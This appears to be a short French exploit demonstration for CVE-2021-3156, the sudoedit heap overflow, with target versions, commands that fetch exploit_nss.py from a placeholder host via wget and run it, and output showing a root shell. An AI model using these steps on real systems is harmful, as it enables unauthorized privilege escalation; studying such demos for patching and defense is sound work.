
CVE-2021-3156-Exploit-Demo
📅 Date : 2025-06-08
✍️ Auteur : @TopskiyPavelQwertyGang
🧠 Chercheur en sécurité | Passionné de Red Team
sudoedit (sudo)Un débordement de tas dans sudoedit permet à un utilisateur local d'obtenir un accès root
lors de l'exécution de la commande sudoedit avec des paramètres spécialement préparés.
L'exploitation est active pour les versions de sudo < 1.9.5p2, y compris les images populaires Ubuntu/Debian/CentOS.
Même avec ASLR activé, la vulnérabilité reste exploitable.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
glibc et sudo :ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
L'exploitation de CVE-2021-3156 reste possible même avec ASLR actif, si glibc ≥ 2.26 et sudo est une version vulnérable.
L'exploit exploit_nss.py s'est avéré le plus stable, fonctionnant du premier coup avec une configuration NSS correcte.
🧨 Système sous contrôle.